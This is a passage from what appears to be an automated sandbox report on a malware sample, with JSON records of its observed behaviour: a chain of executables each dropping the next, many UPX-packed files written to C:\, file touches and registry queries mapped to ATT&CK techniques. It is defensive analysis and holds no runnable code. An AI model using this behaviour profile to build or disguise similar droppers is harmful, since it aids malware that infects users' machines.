file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" trying to touch file \"c:\\ui\\SwDRM.dll\"\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" trying to touch file \"C:\\Windows\\System32\\imm32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"bbhhn.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"nrdvp.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"xlbdxlx.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"68282.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"62242.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"rbldl.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"jbdbn.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"trdvh.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"vdfxt.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"dnppt.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"btvxfh.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"8224062.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" writes file \"c:\\bbhhn.exe\"\n \"bbhhn.exe\" writes file \"c:\\nrdvp.exe\"\n \"nrdvp.exe\" writes file \"c:\\xlbdxlx.exe\"\n \"xlbdxlx.exe\" writes file \"c:\\68282.exe\"\n \"68282.exe\" writes file \"c:\\62242.exe\"\n \"62242.exe\" writes file \"c:\\rbldl.exe\"\n \"rbldl.exe\" writes file \"c:\\jbdbn.exe\"\n \"jbdbn.exe\" writes file \"c:\\trdvh.exe\"\n \"trdvh.exe\" writes file \"c:\\vdfxt.exe\"\n \"vdfxt.exe\" writes file \"c:\\dnppt.exe\"\n \"dnppt.exe\" writes file \"c:\\btvxfh.exe\"\n \"btvxfh.exe\" writes file \"c:\\8224062.exe\"\n \"8224062.exe\" writes file \"c:\\64660.exe\"\n \"64660.exe\" writes file \"c:\\xlfpx.exe\"\n \"xlfpx.exe\" writes file \"c:\\pfffth.exe\"\n \"pfffth.exe\" writes file \"c:\\vnjvhvr.exe\"\n \"vnjvhvr.exe\" writes file \"c:\\jpdvr.exe\"\n \"jpdvr.exe\" writes file \"c:\\jxtxdv.exe\"\n \"jxtxdv.exe\" writes file \"c:\\682244.exe\"\n \"682244.exe\" writes file \"c:\\6040442.exe\"\n \"6040442.exe\" writes file \"c:\\0600220.exe\"\n \"0600220.exe\" writes file \"c:\\2262446.exe\"\n \"2262446.exe\" writes file \"c:\\266028.exe\"\n \"266028.exe\" writes file \"c:\\0600240.exe\"\n \"0600240.exe\" writes file \"c:\\8064042.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"bbhhn.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"nrdvp.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"xlbdxlx.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"68282.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"62242.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"rbldl.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"jbdbn.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"trdvh.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"vdfxt.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"dnppt.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"btvxfh.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"8224062.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"64660.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"xlfpx.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"pfffth.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"vnjvhvr.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"jpdvr.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"jxtxdv.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"682244.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"6040442.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"0600220.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"2262446.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"266028.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"0600240.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"5032D656BB93DE0D6EDB240EA94CE3780ACE041897A62EB59561AF7FBBA0E60E\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\APPCOMPAT\"; Key: \"DISABLEENGINE\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SHELL FOLDERS\"; Key: \"CACHE\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\"; Key: \"DISABLELOCALOVERRIDE\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" reads file \"c:\\5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\"\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" reads file \"c:\\bbhhn.exe\"\n \"bbhhn.exe\" reads file \"c:\\bbhhn.exe\"\n \"bbhhn.exe\" reads file \"c:\\nrdvp.exe\"\n \"nrdvp.exe\" reads file \"c:\\nrdvp.exe\"\n \"nrdvp.exe\" reads file \"c:\\xlbdxlx.exe\"\n \"xlbdxlx.exe\" reads file \"c:\\xlbdxlx.exe\"\n \"xlbdxlx.exe\" reads file \"c:\\68282.exe\"\n \"68282.exe\" reads file \"c:\\68282.exe\"\n \"68282.exe\" reads file \"c:\\62242.exe\"\n \"62242.exe\" reads file \"c:\\62242.exe\"\n \"62242.exe\" reads file \"c:\\rbldl.exe\"\n \"rbldl.exe\" reads file \"c:\\rbldl.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\BBHHN.EXE\"; Key: \"\"; Value: \"\")\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\\APPCERTDLLS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"bphvxnd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"ndjtrh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"lhfrhnr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"482064.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"202048.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"48866.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hrffr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"nfbjp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"6064442.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"44424.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"pdjrtdv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pdjrtdv.exe]- [targetUID: 00000000-00003912]\n \"bvffnn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bvffnn.exe]- [targetUID: 00000000-00003912]\n \"fplrrnr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fplrrnr.exe]- [targetUID: 00000000-00003976]\n \"lrnlbrl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lrnlbrl.exe]- [targetUID: 00000000-00004028]\n \"0086084.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0086084.exe]- [targetUID: 00000000-00001624]\n \"22004.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\22004.exe]- [targetUID: 00000000-00001624]\n \"4688248.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4688248.exe]- [targetUID: 00000000-00003528]\n \"0288086.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0288086.exe]- [targetUID: 00000000-00002836]\n \"vvtbdn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vvtbdn.exe]- [targetUID: 00000000-00004480]\n \"dbhlfn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dbhlfn.exe]- [targetUID: 00000000-00004480]\n \"ptxnnrh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ptxnnrh.exe]- [targetUID: 00000000-00000728]\n \"xxfflb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xxfflb.exe]- [targetUID: 00000000-00002812]\n \"44680.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\44680.exe]- [targetUID: 00000000-00002812]\n \"0024648.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0024648.exe]- [targetUID: 00000000-00002528]\n \"848066.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\848066.exe]- [targetUID: 00000000-00002528]\n \"ldpdlv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ldpdlv.exe]- [targetUID: 00000000-00003012]\n \"ntjjnl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ntjjnl.exe]- [targetUID: 00000000-00001472]\n \"trlhh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\trlhh.exe]- [targetUID: 00000000-00001472]\n \"fdfnr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fdfnr.exe]- [targetUID: 00000000-00001000]\n \"rttxj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rttxj.exe]- [targetUID: 00000000-00000904]\n \"0802042.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0802042.exe]- [targetUID: 00000000-00000904]\n \"42442.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\42442.exe]- [targetUID: 00000000-00001240]\n \"464220.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\464220.exe]- [targetUID: 00000000-00001768]\n \"868648.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\868648.exe]- [targetUID: 00000000-00001768]\n \"8446060.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8446060.exe]- [targetUID: 00000000-00003176]\n \"88806.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\88806.exe]- [targetUID: 00000000-00003176]\n \"vhrdph.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vhrdph.exe]- [targetUID: 00000000-00003180]\n \"nvfdf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nvfdf.exe]- [targetUID: 00000000-00003180]\n \"rnftf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rnftf.exe]- [targetUID: 00000000-00004084]\n \"tjxjxxh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tjxjxxh.exe]- [targetUID: 00000000-00004084]\n \"pdhnvj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pdhnvj.exe]- [targetUID: 00000000-00003460]\n \"62046.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\62046.exe]- [targetUID: 00000000-00002712]\n \"4866828.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4866828.exe]- [targetUID: 00000000-00002712]\n \"40806.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\40806.exe]- [targetUID: 00000000-00000976]\n \"42600.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\42600.exe]- [targetUID: 00000000-00000976]\n \"60486.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\60486.exe]- [targetUID: 00000000-00004268]\n \"fvnph.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fvnph.exe]- [targetUID: 00000000-00004268]\n \"jjxfht.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jjxfht.exe]- [targetUID: 00000000-00003224]\n \"hppjr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hppjr.exe]- [targetUID: 00000000-00004408]\n \"8064042.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8064042.exe]- [targetUID: 00000000-00004408]\n 